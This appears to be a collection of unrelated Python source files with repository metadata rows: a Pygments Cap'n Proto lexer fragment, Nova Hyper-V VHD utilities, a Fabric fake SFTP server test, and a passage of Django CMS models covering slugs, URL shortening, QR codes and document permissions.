(r':', Name.Class, 'type'),
(r'\$', Name.Attribute, 'annotation'),
(r'(struct|enum|interface|union|import|using|const|annotation|'
r'extends|in|of|on|as|with|from|fixed)\b',
Keyword),
(r'[\w.]+', Name),
(r'[^#@=:$\w]+', Text),
],
'type': [
(r'[^][=;,(){}$]+', Name.Class),
(r'[\[(]', Name.Class, 'parentype'),
default('#pop'),
],
'parentype': [
(r'[^][;()]+', Name.Class),
(r'[\[(]', Name.Class, '#push'),
(r'[])]', Name.Class, '#pop'),
default('#pop'),
],
'expression': [
(r'[^][;,(){}$]+', Literal),
(r'[\[(]', Literal, 'parenexp'),
default('#pop'),
],
'parenexp': [
(r'[^][;()]+', Literal),
(r'[\[(]', Literal, '#push'),
(r'[])]', Literal, '#pop'),
default('#pop'),
],
'annotation': [
(r'[^][;,(){}=:]+', Name.Attribute),
(r'[\[(]', Name.Attribute, 'annexp'),
default('#pop'),
],
'annexp': [
(r'[^][;()]+', Name.Attribute),
(r'[\[(]', Name.Attribute, '#push'),
(r'[])]', Name.Attribute, '#pop'),
default('#pop'),
],
}
| wakatime/wakatime | wakatime/packages/py27/pygments/lexers/capnproto.py | Python | bsd-3-clause | 2,194 | 0 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Utility class for VHD related operations.
Official VHD format specs can be retrieved at:
http://technet.microsoft.com/en-us/library/bb676673.aspx
See "Download the Specifications Without Registering"
Official VHDX format specs can be retrieved at:
http://www.microsoft.com/en-us/download/details.aspx?id=34750
"""
import struct
import sys
if sys.platform == 'win32':
import wmi
from nova.openstack.common.gettextutils import _
from nova.virt.hyperv import constants
from nova.virt.hyperv import vmutils
from xml.etree import ElementTree
VHD_HEADER_SIZE_FIX = 512
VHD_BAT_ENTRY_SIZE = 4
VHD_DYNAMIC_DISK_HEADER_SIZE = 1024
VHD_HEADER_SIZE_DYNAMIC = 512
VHD_FOOTER_SIZE_DYNAMIC = 512
VHD_BLK_SIZE_OFFSET = 544
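# 544 = 512-byte copy of the hard disk footer + offset 32 of the 4-byte
# big-endian BlockSize field in the dynamic disk header (per the VHD spec
# referenced above; stated here for orientation, not re-verified).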
VHD_SIGNATURE = 'conectix'
VHDX_SIGNATURE = 'vhdxfile'
class VHDUtils(object):
def __init__(self):
self._vmutils = vmutils.VMUtils()
if sys.platform == 'win32':
self._conn = wmi.WMI(moniker='//./root/virtualization')
def validate_vhd(self, vhd_path):
image_man_svc = self._conn.Msvm_ImageManagementService()[0]
(job_path, ret_val) = image_man_svc.ValidateVirtualHardDisk(
Path=vhd_path)
self._vmutils.check_ret_val(ret_val, job_path)
def create_dynamic_vhd(self, path, max_internal_size, format):
if format != constants.DISK_FORMAT_VHD:
raise vmutils.HyperVException(_("Unsupported disk format: %s") %
format)
image_man_svc = self._conn.Msvm_ImageManagementService()[0]
(job_path, ret_val) = image_man_svc.CreateDynamicVirtualHardDisk(
Path=path, MaxInternalSize=max_internal_size)
self._vmutils.check_ret_val(ret_val, job_path)
def create_differencing_vhd(self, path, parent_path):
image_man_svc = self._conn.Msvm_ImageManagementService()[0]
(job_path, ret_val) = image_man_svc.CreateDifferencingVirtualHardDisk(
Path=path, ParentPath=parent_path)
self._vmutils.check_ret_val(ret_val, job_path)
def reconnect_parent_vhd(self, child_vhd_path, parent_vhd_path):
image_man_svc = self._conn.Msvm_ImageManagementService()[0]
(job_path, ret_val) = image_man_svc.ReconnectParentVirtualHardDisk(
ChildPath=child_vhd_path,
ParentPath=parent_vhd_path,
Force=True)
self._vmutils.check_ret_val(ret_val, job_path)
def merge_vhd(self, src_vhd_path, dest_vhd_path):
image_man_svc = self._conn.Msvm_ImageManagementService()[0]
(job_path, ret_val) = image_man_svc.MergeVirtualHardDisk(
SourcePath=src_vhd_path,
DestinationPath=dest_vhd_path)
self._vmutils.check_ret_val(ret_val, job_path)
def resize_vhd(self, vhd_path, new_max_size, is_file_max_size=True):
if is_file_max_size:
new_internal_max_size = self.get_internal_vhd_size_by_file_size(
vhd_path, new_max_size)
else:
new_internal_max_size = new_max_size
image_man_svc = self._conn.Msvm_ImageManagementService()[0]
(job_path, ret_val) = image_man_svc.ExpandVirtualHardDisk(
Path=vhd_path, MaxInternalSize=new_internal_max_size)
self._vmutils.check_ret_val(ret_val, job_path)
def get_internal_vhd_size_by_file_size(self, vhd_path, new_vhd_file_size):
"""Fixed VHD size = Data Block size + 512 bytes
Dynamic_VHD_size = Dynamic Disk Header
+ Copy of hard disk footer
+ Hard Disk Footer
+ Data Block
+ BAT
Dynamic Disk header fields
Copy of hard disk footer (512 bytes)
Dynamic Disk Header (1024 bytes)
BAT (Block Allocation table)
Data Block 1
Data Block 2
Data Block n
Hard Disk Footer (512 bytes)
Default block size is 2M
BAT entry size is 4byte
"""
base_vhd_info = self.get_vhd_info(vhd_path)
vhd_type = base_vhd_info['Type']
if vhd_type == constants.VHD_TYPE_FIXED:
vhd_header_size = VHD_HEADER_SIZE_FIX
return new_vhd_file_size - vhd_header_size
elif vhd_type == constants.VHD_TYPE_DYNAMIC:
bs = self._get_vhd_dynamic_blk_size(vhd_path)
bes = VHD_BAT_ENTRY_SIZE
ddhs = VHD_DYNAMIC_DISK_HEADER_SIZE
hs = VHD_HEADER_SIZE_DYNAMIC
fs = VHD_FOOTER_SIZE_DYNAMIC
max_internal_size = (new_vhd_file_size -
(hs + ddhs + fs)) * bs / (bes + bs)
return max_internal_size
else:
raise vmutils.HyperVException(_("The %(vhd_type)s type VHD "
"is not supported") %
{"vhd_type": vhd_type})
def _get_vhd_dynamic_blk_size(self, vhd_path):
blk_size_offset = VHD_BLK_SIZE_OFFSET
try:
with open(vhd_path, "rb") as f:
f.seek(blk_size_offset)
version = f.read(4)
except IOError:
raise vmutils.HyperVException(_("Unable to obtain block size from"
" VHD %(vhd_path)s") %
{"vhd_path": vhd_path})
return struct.unpack('>i', version)[0]
def get_vhd_parent_path(self, vhd_path):
return self.get_vhd_info(vhd_path).get("ParentPath")
def get_vhd_info(self, vhd_path):
image_man_svc = self._conn.Msvm_ImageManagementService()[0]
(vhd_info,
job_path,
ret_val) = image_man_svc.GetVirtualHardDiskInfo(vhd_path)
self._vmutils.check_ret_val(ret_val, job_path)
vhd_info_dict = {}
et = ElementTree.fromstring(vhd_info)
for item in et.findall("PROPERTY"):
name = item.attrib["NAME"]
value_text = item.find("VALUE").text
if name == "ParentPath":
vhd_info_dict[name] = value_text
elif name in ["FileSize", "MaxInternalSize"]:
vhd_info_dict[name] = long(value_text)
elif name in ["InSavedState", "InUse"]:
vhd_info_dict[name] = bool(value_text)
elif name == "Type":
vhd_info_dict[name] = int(value_text)
return vhd_info_dict
def get_vhd_format(self, path):
with open(path, 'rb') as f:
# Read header
if f.read(8) == VHDX_SIGNATURE:
return constants.DISK_FORMAT_VHDX
# Read footer
f.seek(0, 2)
file_size = f.tell()
if file_size >= 512:
f.seek(-512, 2)
if f.read(8) == VHD_SIGNATURE:
return constants.DISK_FORMAT_VHD
raise vmutils.HyperVException(_('Unsupported virtual disk format'))
def get_best_supported_vhd_format(self):
return constants.DISK_FORMAT_VHD
| ntt-sic/nova | nova/virt/hyperv/vhdutils.py | Python | apache-2.0 | 7,795 | 0.000257 |
"""
Tests for the test server itself.
Not intended to be run by the greater test suite, only by specifically
targeting it on the command-line. Rationale: not really testing Fabric itself,
no need to pollute Fab's own test suite. (Yes, if these tests fail, it's likely
that the Fabric tests using the test server may also have issues, but still.)
"""
__test__ = False
from nose.tools import eq_, ok_
from fabric.network import ssh
from server import FakeSFTPServer
class AttrHolder(object):
pass
def test_list_folder():
for desc, file_map, arg, expected in (
(
"Single file",
{'file.txt': 'contents'},
'',
['file.txt']
),
(
"Single absolute file",
{'/file.txt': 'contents'},
'/',
['file.txt']
),
(
"Multiple files",
{'file1.txt': 'contents', 'file2.txt': 'contents2'},
'',
['file1.txt', 'file2.txt']
),
(
"Single empty folder",
{'folder': None},
'',
['folder']
),
(
"Empty subfolders",
{'folder': None, 'folder/subfolder': None},
'',
['folder']
),
(
"Non-empty sub-subfolder",
{'folder/subfolder/subfolder2/file.txt': 'contents'},
"folder/subfolder/subfolder2",
['file.txt']
),
(
"Mixed files, folders empty and non-empty, in homedir",
{
'file.txt': 'contents',
'file2.txt': 'contents2',
'folder/file3.txt': 'contents3',
'empty_folder': None
},
'',
['file.txt', 'file2.txt', 'folder', 'empty_folder']
),
(
"Mixed files, folders empty and non-empty, in subdir",
{
'file.txt': 'contents',
'file2.txt': 'contents2',
'folder/file3.txt': 'contents3',
'folder/subfolder/file4.txt': 'contents4',
'empty_folder': None
},
"folder",
['file3.txt', 'subfolder']
),
):
# Pass in fake server obj. (Can't easily clean up API to be more
# testable since it's all implementing 'ssh' interface stuff.)
server = AttrHolder()
server.files = file_map
interface = FakeSFTPServer(server)
results = interface.list_folder(arg)
# In this particular suite of tests, all results should be a file list,
# not "no files found"
ok_(results != ssh.SFTP_NO_SUCH_FILE)
# Grab filename from SFTPAttribute objects in result
output = map(lambda x: x.filename, results)
# Yield test generator
eq_.description = "list_folder: %s" % desc
yield eq_, set(expected), set(output)
del eq_.description
| jaraco/fabric | tests/test_server.py | Python | bsd-2-clause | 2,975 | 0 |
from datetime import datetime
import io
import os
import tempfile
import zipfile
from PIL import Image, ImageFont
from PIL.Image import LANCZOS
from PIL.ImageDraw import Draw
from django.conf import settings
from django.contrib.auth.models import Permission
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.contrib.postgres.fields.jsonb import JSONField
from django.core import serializers
from django.core.exceptions import ObjectDoesNotExist
from django.core.files.base import File
from django.core.files.storage import FileSystemStorage
from django.core.serializers.json import DjangoJSONEncoder
from django.db import models
from django.db.models import Q, F
from django.db.models.deletion import PROTECT, CASCADE
from django.http.response import HttpResponse
from django.utils import timezone
from django.utils.functional import cached_property
from django.utils.text import slugify
from django.utils.translation import ugettext_lazy as _
from django_extensions.db.fields.json import JSONField as django_extensions_JSONField
from reportlab.lib.pagesizes import A4, landscape
from reportlab.pdfgen import canvas
from reportlab.platypus.doctemplate import SimpleDocTemplate
import qrcode
from cmj import globalrules
from cmj.core.models import AuditLog
from cmj.mixins import CmjChoices
from cmj.utils import get_settings_auth_user_model, YES_NO_CHOICES, \
restringe_tipos_de_arquivo_midias, TIPOS_IMG_PERMITIDOS, \
media_protected_storage
from sapl.materia.models import MateriaLegislativa
from sapl.parlamentares.models import Parlamentar
CLASSE_ESTRUTURAL = 0
CLASSE_DOCUMENTAL = 1
CLASSE_MISTA = 2
PERFIL_CLASSE = ((
CLASSE_ESTRUTURAL, _('Classe Estrutural')),
(
CLASSE_DOCUMENTAL, _('Classe de Conteúdo')),
(
CLASSE_MISTA, _('Classe Mista'))
)
DOC_TEMPLATES_CHOICE_FILES = {
1: {
'template_name': 'path/path_documento.html',
'create_url': 'cmj.sigad:documento_construct_create'
},
2: {
'template_name': 'path/path_thumbnails.html',
'create_url': 'cmj.sigad:documento_construct_create'
},
99: {
'template_name': 'path/path_documento.html',
'create_url': 'cmj.sigad:documento_construct_create'
},
}
DOC_TEMPLATES_CHOICE = CmjChoices(
(1, 'noticia', _('Notícia Pública')),
(2, 'galeria', _('Galeria de Imagens')),
)
CLASSE_TEMPLATES_CHOICE_FILES = {
1: 'path/path_classe.html',
2: 'path/path_galeria.html',
3: 'path/path_parlamentares.html',
4: 'path/path_parlamentar.html',
5: 'path/path_galeria.html',
6: 'path/path_classe.html',
7: 'path/path_galeria_video.html',
99: 'path/path_documento.html',
}
CLASSE_DOC_MANAGER_CHOICE = {
1: 'qs_news',
2: 'view_public_gallery',
3: 'qs_news',
4: 'qs_news',
5: 'qs_bi',
6: 'qs_audio_news',
7: 'qs_video_news',
99: None,
}
CLASSE_TEMPLATES_CHOICE = CmjChoices(
(1, 'lista_em_linha', _('Listagem em Linha')),
(2, 'galeria', _('Galeria Albuns')),
(3, 'parlamentares', _('Página dos Parlamentares')),
(4, 'parlamentar', _('Página individual de Parlamentar')),
(5, 'fotografia', _('Banco de Imagens')),
(6, 'galeria_audio', _('Galeria de Áudios')),
(7, 'galeria_video', _('Galeria de Vídeos')),
(99, 'documento_especifico', _('Documento Específico')),
)
class Parent(models.Model):
parent = models.ForeignKey(
'self',
blank=True, null=True, default=None,
related_name='childs',
verbose_name=_('Filhos'),
on_delete=PROTECT)
raiz = models.ForeignKey(
'self',
blank=True, null=True, default=None,
related_name='nodes',
verbose_name=_('Containers'),
on_delete=PROTECT)
related_classes = models.ManyToManyField(
'self', blank=True,
verbose_name=_('Classes Relacionadas'))
class Meta:
abstract = True
@property
def parents(self):
if not self.parent:
return []
parents = self.parent.parents + [self.parent, ]
return parents
@property
def parents_and_me(self):
if not self.parent:
return [self]
parents = self.parent.parents + [self.parent, self]
return parents
@property
def classes_parents(self):
if not hasattr(self, 'classe'):
return self.parents
_p = self.parents
p = _p or [self]
parents = p[0].classe.parents_and_me + _p
return parents
@property
def classes_parents_and_me(self):
if not hasattr(self, 'classe'):
return self.parents_and_me
p = self.parents_and_me
parents = p[0].classe.parents_and_me + p
return parents
def treechilds2list(self):
yield self
for child in self.childs.view_childs():
for item in child.treechilds2list():
yield item
class CMSMixin(models.Model):
STATUS_PRIVATE = 99
STATUS_RESTRICT = 1
STATUS_PUBLIC = 0
VISIBILIDADE_STATUS = CmjChoices(
(STATUS_RESTRICT, 'status_restrict', _('Restrito')),
(STATUS_PUBLIC, 'status_public', _('Público')),
(STATUS_PRIVATE, 'status_private', _('Privado')),
)
ALINHAMENTO_LEFT = 0
ALINHAMENTO_JUSTIFY = 1
ALINHAMENTO_RIGHT = 2
ALINHAMENTO_CENTER = 3
alinhamento_choice = CmjChoices(
(ALINHAMENTO_LEFT, 'alinhamento_left', _('Alinhamento Esquerdo')),
(ALINHAMENTO_JUSTIFY, 'alinhamento_justify', _('Alinhamento Completo')),
(ALINHAMENTO_RIGHT, 'alinhamento_right', _('Alinhamento Direito')),
(ALINHAMENTO_CENTER, 'alinhamento_center', _('Alinhamento Centralizado')),
)
TD_NEWS = 0
TD_DOC = 5
TD_BI = 10
TD_GALERIA_PUBLICA = 20
TD_AUDIO_NEWS = 30
TD_VIDEO_NEWS = 40
TPD_TEXTO = 100
TPD_FILE = 200
TPD_CONTAINER_SIMPLES = 700
TPD_CONTAINER_EXTENDIDO = 701
TPD_CONTAINER_FILE = 750
TPD_VIDEO = 800
TPD_AUDIO = 850
TPD_IMAGE = 900
TPD_GALLERY = 901
    # Complete documents
TDs = (TD_NEWS, TD_DOC, TD_BI, TD_GALERIA_PUBLICA,
TD_AUDIO_NEWS, TD_VIDEO_NEWS)
# Containers
TDc = (TPD_CONTAINER_SIMPLES, TPD_CONTAINER_EXTENDIDO, TPD_CONTAINER_FILE)
    # Parts
TDp = (TPD_TEXTO, TPD_FILE, TPD_VIDEO, TPD_AUDIO, TPD_IMAGE, TPD_GALLERY)
    # Types that are not directly accessible via URL
TDp_exclude_render = (TPD_TEXTO,
TPD_CONTAINER_SIMPLES,
TPD_CONTAINER_EXTENDIDO,
TPD_VIDEO,
TPD_AUDIO)
tipo_parte_doc = {
'documentos': CmjChoices(
(TD_NEWS, 'td_news', _('Notícias')),
(TD_DOC, 'td_doc', _('Documento')),
(TD_BI, 'td_bi', _('Banco de Imagem')),
(TD_GALERIA_PUBLICA, 'td_galeria_publica', _('Galeria Pública')),
(TD_AUDIO_NEWS, 'td_audio_news', _('Áudio Notícia')),
(TD_VIDEO_NEWS, 'td_video_news', _('Vídeo Notícia')),
),
'containers': CmjChoices(
(TPD_CONTAINER_SIMPLES,
'container', _('Container Simples')),
(TPD_CONTAINER_EXTENDIDO,
'container_fluid', _('Container Extendido')),
(TPD_CONTAINER_FILE,
'container_file', _('Container de Imagens para Arquivo PDF')),
),
'subtipos': CmjChoices(
(TPD_TEXTO, 'tpd_texto', _('Texto')),
(TPD_FILE, 'tpd_file', _('Arquivo')),
(TPD_VIDEO, 'tpd_video', _('Vídeo')),
(TPD_AUDIO, 'tpd_audio', _('Áudio')),
(TPD_IMAGE, 'tpd_image', _('Imagem')),
(TPD_GALLERY, 'tpd_gallery', _('Galeria de Imagens')),
)
}
tipo_parte_doc_choice = (tipo_parte_doc['documentos'] +
tipo_parte_doc['containers'] +
tipo_parte_doc['subtipos'])
created = models.DateTimeField(
verbose_name=_('created'), editable=False, auto_now_add=True)
public_date = models.DateTimeField(
null=True, default=None,
verbose_name=_('Data de Início de Publicação'))
public_end_date = models.DateTimeField(
null=True, default=None,
verbose_name=_('Data de Fim de Publicação'))
owner = models.ForeignKey(
get_settings_auth_user_model(),
verbose_name=_('owner'), related_name='+',
on_delete=PROTECT)
descricao = models.TextField(
verbose_name=_('Descrição'),
blank=True, null=True, default=None)
autor = models.TextField(
verbose_name=_('Autor'),
blank=True, null=True, default=None)
visibilidade = models.IntegerField(
_('Visibilidade'),
choices=VISIBILIDADE_STATUS,
default=STATUS_PRIVATE)
listar = models.BooleanField(
_('Aparecer nas Listagens'),
choices=YES_NO_CHOICES,
default=True)
class Meta:
abstract = True
@property
def revisoes(self):
        # implemented as a property, and not as a GenericRelation, because the
        # Revisao must be kept even if the Documento is deleted.
concret_model = None
for kls in reversed(self.__class__.__mro__):
if issubclass(kls, CMSMixin) and not kls._meta.abstract:
concret_model = kls
qs = AuditLog.objects.filter(
content_type=ContentType.objects.get_for_model(concret_model),
object_id=self.pk)
return qs
@property
def revisoes_old(self):
        # implemented as a property, and not as a GenericRelation, because the
        # Revisao must be kept even if the Documento is deleted.
concret_model = None
for kls in reversed(self.__class__.__mro__):
if issubclass(kls, CMSMixin) and not kls._meta.abstract:
concret_model = kls
qs = Revisao.objects.filter(
content_type=ContentType.objects.get_for_model(concret_model),
object_id=self.pk)
return qs
@property
def modified(self):
rev = self.revisoes
return rev.first().timestamp
def clean(self):
"""
Check for instances with null values in unique_together fields.
"""
from django.core.exceptions import ValidationError
super(CMSMixin, self).clean()
for field_tuple in self._meta.unique_together[:]:
unique_filter = {}
unique_fields = []
null_found = False
for field_name in field_tuple:
field_value = getattr(self, field_name)
if getattr(self, field_name) is None:
unique_filter['%s__isnull' % field_name] = True
null_found = True
else:
unique_filter['%s' % field_name] = field_value
unique_fields.append(field_name)
if null_found:
unique_queryset = self.__class__.objects.filter(
**unique_filter)
if self.pk:
unique_queryset = unique_queryset.exclude(pk=self.pk)
if unique_queryset.exists():
msg = self.unique_error_message(
self.__class__, tuple(unique_fields))
raise ValidationError(msg)
class Slugged(Parent):
titulo = models.CharField(
verbose_name=_('Título'),
max_length=250,
blank=True, null=True, default='')
apelido = models.CharField(
verbose_name=_('Apelido'),
max_length=250,
blank=True, null=True, default='')
slug = models.SlugField(max_length=2000)
class Meta:
abstract = True
def _local_save(self, *args, **kwargs):
super(Slugged, self).save(*args, **kwargs)
def save(self, *args, **kwargs):
slug_old = self.slug
if not self.id:
super(Slugged, self).save(*args, **kwargs)
kwargs['force_insert'] = False
kwargs['force_update'] = True
if self._meta.model == Documento and not self.parent and self.titulo:
slug = self.titulo
elif self._meta.model == Classe:
slug = self.titulo
else:
slug = str(self.id)
self.slug = self.generate_unique_slug(slug)
if self.parent and hasattr(self, 'classe'):
self.visibilidade = self.parent.visibilidade
self.public_date = self.parent.public_date
self.listar = self.parent.listar
if hasattr(self, 'classe'):
self.classe = self.parent.classe
self.raiz = self.parent.raiz if self.parent.raiz else self.parent
super(Slugged, self).save(*args, **kwargs)
if self._meta.model == Classe and self.slug != slug_old:
count = self.documento_set.filter(parent__isnull=True).count()
for documento in self.documento_set.filter(parent__isnull=True):
documento.save()
# print(self.titulo, count, self.slug)
count -= 1
for child in self.childs.all():
child.save()
if hasattr(self, 'cita'):
for citacao in self.cita.all():
citacao.save()
def generate_unique_slug(self, slug):
concret_model = None
for kls in reversed(self.__class__.__mro__):
if issubclass(kls, Slugged) and not kls._meta.abstract:
concret_model = kls
slug = slugify(slug)
parents_slug = (self.parent.slug + '/') if self.parent else ''
custom_slug = ''
if not self.parent and hasattr(self, 'classe'):
custom_slug = self.classe.slug + '/'
elif hasattr(self, 'referente'):
custom_slug = self.referente.slug + '/'
slug_base = custom_slug + parents_slug + slug
slug = slug_base
i = 0
while True:
if i > 0:
slug = "%s-%s" % (slug_base, i)
try:
obj = concret_model.objects.get(
# **{'slug': slug, 'parent': self.parent})
** {'slug': slug})
if obj == self:
raise ObjectDoesNotExist
except ObjectDoesNotExist:
break
i += 1
return slug
@cached_property
def nivel(self):
parents = self.parents
return len(parents)
@property
def strparents(self):
if not self.parent:
return []
parents = self.parent.strparents + [self.parent.titulo, ]
return parents
def __str__(self):
parents = self.strparents
parents.append(self.titulo)
return ':'.join(parents)
@property
def absolute_slug(self):
raise NotImplementedError(_('Método não implementado pela subclasse!'))
# short_service = build(
# 'urlshortener', 'v1', developerKey=settings.GOOGLE_URL_SHORTENER_KEY)
def short_url(**kwargs):
return ''
    # THE GOOGLE URL SHORTENER WAS SHUT DOWN ON 30/05/2019
import urllib3
import json
domain = kwargs.get('domain', 'https://www.jatai.go.leg.br')
slug = kwargs.get('slug', '')
fields = {
'longUrl': '%s/%s' % (domain, slug),
}
encoded_data = json.dumps(fields).encode('utf-8')
http = urllib3.PoolManager()
r = http.request(
'POST',
'https://www.googleapis.com/urlshortener/v1/url?'
'fields=id&key=' + settings.GOOGLE_URL_SHORTENER_KEY,
body=encoded_data,
headers={'Content-Type': 'application/json'})
try:
data = r.data.decode('utf-8')
jdata = json.loads(data)
return jdata['id']
except Exception as e:
print(e)
return ''
class UrlShortenerManager(models.Manager):
def get_or_create_short(self, **kwargs):
url = self.get_queryset().filter(**kwargs).first()
if not url:
bts = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
url = UrlShortener()
url.url_long = kwargs['url_long']
url.automatico = kwargs.get('automatico', True)
url.link_absoluto = kwargs.get('link_absoluto', False)
url.save()
def b62encode(id):
if id < 62:
return bts[id]
r = id % 62
return b62encode(id // 62) + bts[r]
# rn*62^n + ... + r2*62^2 + r1*62^1 + q*62^0
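            # Worked example (illustrative): b62encode(125) -> b62encode(2) +
            # bts[1] = '2' + '1' = '21', and b62encode(3844) -> '100', since
            # 3844 = 1*62**2 + 0*62 + 0.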
url_short = b62encode(url.id)
url.url_short = url_short
url.save()
return url
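    # Typical use (sketch; the path below is hypothetical):
    #   UrlShortener.objects.get_or_create_short(url_long='/path/to/page')
    # returns the existing row for that long URL, or creates one whose
    # url_short is the base-62 encoding of its primary key.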
class UrlShortener(models.Model):
objects = UrlShortenerManager()
url_short = models.TextField(
verbose_name=_('Link Curto'),
db_index=True,
blank=True, null=True, default=None)
url_long = models.TextField(
verbose_name=_('Link Longo'),
db_index=True)
link_absoluto = models.BooleanField(
_('Link Absoluto'),
choices=YES_NO_CHOICES,
default=False)
automatico = models.BooleanField(
_('Link Automático'),
choices=YES_NO_CHOICES,
default=True)
created = models.DateTimeField(
verbose_name=_('Data de Criação'),
editable=False, auto_now_add=True)
class Meta:
ordering = ('url_short',)
unique_together = (
('url_short', 'url_long',),
)
verbose_name = _('UrlShortener')
verbose_name_plural = _('UrlShortener')
@property
def absolute_short(self, protocol=True):
if settings.DEBUG:
return 'http://localhost:9000/j{}'.format(
self.url_short
)
return '{}jatai.go.leg.br/j{}'.format(
'https://' if protocol else '',
self.url_short
)
def __str__(self):
return 'Link Curto: {}'.format(self.url_short)
@property
def qrcode(self):
fn = '/tmp/portalcmj_qrcode_{}.png'.format(self.url_short)
brasao = settings.FRONTEND_BRASAO_PATH['128']
ibr = Image.open(brasao)
new_image = Image.new("RGBA", (144, 128), "WHITE")
new_image.paste(ibr, (8, -10), ibr)
draw = Draw(new_image)
font = ImageFont.truetype(
font=settings.PROJECT_DIR.child('fonts').child('Helvetica.ttf'),
size=11)
size_text = font.getsize(self.absolute_short)
draw.rectangle(
(0, 128 - size_text[1] - 8, 144 - 1, 128 - 1),
fill=(17, 77, 129),
outline=(17, 77, 129),
width=2)
draw.text(
(72 - size_text[0] / 2, 128 - size_text[1] - 4),
self.absolute_short,
(255, 255, 255),
font=font)
draw.rectangle(
(0, 0, 144 - 1, 128 - 1),
fill=None,
outline=(17, 77, 129),
width=2)
qr = qrcode.QRCode(
version=6,
error_correction=qrcode.constants.ERROR_CORRECT_H,
box_size=8,
border=2
)
qr.add_data(self.absolute_short)
qr.make()
irq = qr.make_image().convert('RGB')
pos = ((irq.size[0] - new_image.size[0]) // 2,
(irq.size[1] - new_image.size[1]) // 2)
irq.paste(new_image, pos)
irq.save(fn)
with open(fn, 'rb') as f:
return f.read()
class ShortRedirect(models.Model):
url = models.ForeignKey(UrlShortener, related_name='acessos_set',
verbose_name=_('UrlShortner'),
on_delete=CASCADE)
metadata = JSONField(
verbose_name=_('Metadados'),
blank=True, null=True, default=None, encoder=DjangoJSONEncoder)
created = models.DateTimeField(
verbose_name=_('created'),
editable=False, auto_now_add=True)
class Meta:
ordering = ('-created',)
class ShortUrl(Slugged):
def short_url(self, sufix=None):
slug = self.absolute_slug + (sufix if sufix else '')
return UrlShortener.objects.get_or_create_short(
url_long=slug
).absolute_short
class Meta:
abstract = True
class Classe(ShortUrl, CMSMixin):
codigo = models.PositiveIntegerField(verbose_name=_('Código'), default=0)
perfil = models.IntegerField(
_('Perfil da Classe'),
choices=PERFIL_CLASSE,
default=CLASSE_ESTRUTURAL)
template_doc_padrao = models.IntegerField(
_('Template para o Documento'),
choices=DOC_TEMPLATES_CHOICE,
default=DOC_TEMPLATES_CHOICE.noticia)
tipo_doc_padrao = models.IntegerField(
_('Tipo Padrão para Documentos desta Classe'),
choices=CMSMixin.tipo_parte_doc['documentos'],
default=CMSMixin.TD_DOC)
template_classe = models.IntegerField(
_('Template para a Classe'),
choices=CLASSE_TEMPLATES_CHOICE,
default=CLASSE_TEMPLATES_CHOICE.lista_em_linha)
parlamentar = models.ForeignKey(
Parlamentar, related_name='classe_set',
verbose_name=_('Parlamentar'),
blank=True, null=True, default=None,
on_delete=PROTECT)
capa = models.OneToOneField(
'Documento',
blank=True, null=True, default=None,
verbose_name=_('Capa da Classe'),
related_name='capa',
on_delete=PROTECT)
class Meta:
ordering = ('codigo', '-public_date',)
unique_together = (
('slug', 'parent',),
)
verbose_name = _('Classe')
verbose_name_plural = _('Classes')
permissions = (
('view_subclasse', _('Visualização de Subclasses')),
('view_pathclasse', _('Visualização de Classe via Path')),
)
def imagem_representativa(self):
if hasattr(self, 'parlamentar'):
return self.parlamentar
return None
def imagem_representativa_metatags(self):
if hasattr(self, 'parlamentar'):
return self.parlamentar
return None
@cached_property
def conta(self):
ct = [str(p.codigo) for p in self.parents]
ct.append(str(self.codigo))
if len(ct[0]) < 3:
ct[0] = '{:03,d}'.format(int(ct[0]))
return '.'.join(ct)
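        # Illustrative example: a classe with codigo 3 under parents with
        # codigos [1, 20] yields '001.20.3' (root segment zero-padded to 3).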
@property
def absolute_slug(self):
return self.slug
class PermissionsUserClasse(CMSMixin):
user = models.ForeignKey(get_settings_auth_user_model(),
blank=True, null=True, default=None,
verbose_name=_('Usuário'),
on_delete=PROTECT)
classe = models.ForeignKey(Classe, verbose_name=_('Classe'),
related_name='permissions_user_set',
on_delete=PROTECT)
permission = models.ForeignKey(Permission,
blank=True, null=True, default=None,
verbose_name=_('Permissão'),
on_delete=PROTECT)
def __str__(self):
return '%s - %s' % (self.permission, self.user or '')
def validate_unique(self, exclude=None):
if 'classe' in exclude:
exclude.remove('classe')
CMSMixin.validate_unique(self, exclude=exclude)
class Meta:
unique_together = (
('user', 'classe', 'permission'),
)
verbose_name = _('Permissão de Usuário para Classe')
verbose_name_plural = _('Permissões de Usuários para Classes')
class DocumentoManager(models.Manager):
use_for_related_fields = True
filters_created = False
@property
def q_doc_public(self):
return (Q(public_end_date__gte=timezone.now()) |
Q(public_end_date__isnull=True) &
Q(public_date__lte=timezone.now(),
visibilidade=Documento.STATUS_PUBLIC))
def q_filters(self):
if self.filters_created:
return
self.filters_created = True
self.q_news = Q(tipo=Documento.TD_NEWS, parent__isnull=True)
self.q_doc = Q(tipo=Documento.TD_DOC, parent__isnull=True)
self.q_gallery = Q(tipo=Documento.TPD_GALLERY)
self.q_image = Q(tipo=Documento.TPD_IMAGE)
self.q_bi = Q(tipo=Documento.TD_BI, parent__isnull=True)
self.q_audio_news = Q(
tipo=Documento.TD_AUDIO_NEWS, parent__isnull=True)
self.q_video_news = Q(
tipo=Documento.TD_VIDEO_NEWS, parent__isnull=True)
def filter_q_private(self, user):
return Q(visibilidade=Documento.STATUS_PRIVATE, owner=user)
def filter_q_restrict(self, user):
qstatus = Q(visibilidade=Documento.STATUS_RESTRICT)
        # Restricted items that have users explicitly listed for access
        # and therefore do not depend on permissions
q0 = Q(permissions_user_set__permission__isnull=True,
permissions_user_set__user=user)
        # if there is no restriction, belonging to the restricted-view group is enough
q1 = Q(permissions_user_set__isnull=True)
q2 = Q(classe__permissions_user_set__permission__isnull=True,
classe__permissions_user_set__user=user)
q3 = Q(classe__permissions_user_set__isnull=True)
q4 = Q(permissions_user_set__user__isnull=True,
permissions_user_set__permission__isnull=False)
q5 = Q(classe__permissions_user_set__user__isnull=True,
classe__permissions_user_set__permission__isnull=False)
if type.mro(type(self))[0] == DocumentoManager:
return qstatus & (q0 | q1)
